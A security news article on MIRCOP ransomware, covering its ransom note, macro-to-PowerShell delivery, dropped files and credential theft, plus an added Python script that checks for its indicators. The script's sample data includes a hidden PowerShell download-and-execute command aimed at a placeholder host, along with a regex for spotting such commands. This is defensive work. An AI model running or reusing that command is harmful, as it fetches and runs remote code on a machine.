
MIRCOP Ransomware Claims to be Victim, Demands Payback

Ransomware authors use various techniques to encourage victims to pay a ransom, and the actors behind a new threat called MIRCOP are employing an unusual one: the ransom note claims that the victim stole 48.48 Bitcoins. 

What’s more, the ransom note displays a hooded figure in a Guy Fawkes mask, which has long been associated with the hacktivist group Anonymous, and offers little instruction on how the victim should pay. Instead, it implies that the victim already knows how to return the money and who is demanding it.

At 48.48 Bitcoins, the ransom amounts to around $30,000, one of the highest seen, and the note threatens further action if the victim doesn’t pay, researchers at Trend Micro reveal. The note does include a Bitcoin address, but gives no details on how a victim would make a crypto-currency payment. No payment had been made to that address at the time of writing.

The MIRCOP ransomware is distributed as a malicious document attached to spam emails, purporting to be a Thai customs form used when importing or exporting goods. The document asks the user to enable macros, ostensibly so that the form can be signed; the macro instead invokes Windows PowerShell to download and execute the malicious payload.

MIRCOP drops three files in the %Temp% folder: c.exe (an information-stealing routine), and x.exe and y.exe (both used to encrypt files). Unlike most other ransomware families, the new threat does not append an extension to encrypted files; instead it prepends the string “Lock.” to the file name. It also targets the common user folders for encryption.
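The two paragraphs above give enough detail for a simple host triage check. The following Python is an added example, not code from the article or from Trend Micro: it flags the three dropper names when they sit in a Windows temp directory, file names carrying the “Lock.” prefix, and powershell.exe launched by an Office process, noting whether its command line contains a download cradle. Only the dropper names and the “Lock.” prefix come from the article; the Office process names, the download-cradle keywords, and the sample file and process records are constructed assumptions, since the article does not publish MIRCOP’s actual PowerShell command line.

```python
"""Host triage for the MIRCOP indicators described in the article.

Added example, not Trend Micro's code. Only the three dropper names and
the "Lock." prefix come from the article; everything else is an assumption.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# From the article: droppers written to %Temp%, and the prefix put on encrypted files.
DROPPER_NAMES = {"c.exe", "x.exe", "y.exe"}
LOCK_PREFIX = "Lock."

# Assumptions: Office hosts that run macros, and keywords typical of a
# PowerShell download cradle (the article does not give MIRCOP's command line).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I
)


@dataclass(frozen=True)
class Finding:
    kind: str    # "dropper", "encrypted", "macro_powershell", "macro_powershell_download"
    detail: str  # the path or command line that triggered it


def is_temp_dir(path: str) -> bool:
    """True for the usual Windows temp locations (%Temp% and C:\\Windows\\Temp)."""
    norm = path.replace("/", "\\").lower()
    return "\\appdata\\local\\temp\\" in norm or norm.startswith("c:\\windows\\temp\\")


def check_file(path: str) -> List[Finding]:
    """Flag a dropper name sitting in a temp directory, or an encrypted-file name."""
    findings = []
    name = ntpath.basename(path)
    if name.lower() in DROPPER_NAMES and is_temp_dir(path):
        findings.append(Finding("dropper", path))
    # The article says the string is prepended, so match on the start of the
    # name only; "Unlock.txt" or a "Lock." later in the name must not fire.
    if name.startswith(LOCK_PREFIX):
        findings.append(Finding("encrypted", path))
    return findings


def check_process(parent_image: str, image: str, cmdline: str) -> List[Finding]:
    """Flag powershell.exe spawned by an Office process, and whether it downloads."""
    if ntpath.basename(image).lower() != "powershell.exe":
        return []
    if ntpath.basename(parent_image).lower() not in OFFICE_PARENTS:
        return []
    kind = "macro_powershell_download" if DOWNLOAD_CRADLE.search(cmdline) else "macro_powershell"
    return [Finding(kind, cmdline)]


def triage(files: List[str], processes: List[Tuple[str, str, str]]) -> Dict[str, int]:
    """Run both checks and return a count of findings per kind."""
    counts: Dict[str, int] = {}
    for f in files:
        for finding in check_file(f):
            counts[finding.kind] = counts.get(finding.kind, 0) + 1
    for parent, image, cmdline in processes:
        for finding in check_process(parent, image, cmdline):
            counts[finding.kind] = counts.get(finding.kind, 0) + 1
    return counts


# Constructed sample data (not from a real infection) to exercise the checks.
SAMPLE_FILES = [
    r"C:\Users\alice\AppData\Local\Temp\c.exe",
    r"C:\Users\alice\AppData\Local\Temp\x.exe",
    r"C:\Users\alice\AppData\Local\Temp\y.exe",
    r"C:\Tools\x.exe",                          # same name outside temp: not flagged
    r"C:\Users\alice\Documents\Lock.budget.xlsx",
    r"C:\Users\alice\Documents\Unlock.txt",     # contains "lock." but not as a prefix
]
SAMPLE_PROCESSES = [
    ("WINWORD.EXE", "powershell.exe",
     "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"),
    ("explorer.exe", "powershell.exe", "powershell -File C:\\scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for kind, n in sorted(triage(SAMPLE_FILES, SAMPLE_PROCESSES).items()):
        print(f"{kind}: {n}")
```

The file check matches the dropper names only inside a temp directory, because x.exe or c.exe elsewhere on a host is too common a name to alert on, and the prefix check is anchored to the start of the file name so that names merely containing “lock.” do not fire. The process check is the generic Office-to-PowerShell parent/child pattern the article’s infection chain relies on; in production it would be fed from Sysmon or EDR process-creation events rather than from the constructed list here.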

In addition to encrypting files on the infected machine, MIRCOP can steal credentials from various applications, including Mozilla Firefox, Google Chrome, Opera, FileZilla, and Skype, researchers discovered. In this regard, MIRCOP is not the first ransomware to pack info-stealing capabilities, given that CryptXXX has had the feature for over two months now.

“Social engineering in the form of spam can lead to infection, especially when the malware employs underhanded tactics such as macro malware leveraging on PowerShell in attached files. Users should be careful when receiving mail from unknown sources and should refrain from downloading and opening their attachments if any,” Trend Micro researchers note.

Since the beginning of this year, ransomware has emerged as a prevalent threat, and a recent report from Kaspersky revealed that the number of users attacked with cryptoware increased 5.5 times over the past couple of years. At the moment, Locky appears to be the top ransomware out there, courtesy of massive infection campaigns powered by the Necurs botnet.

Related: Bart Ransomware Doesn't Require C&C Server to Encrypt Files
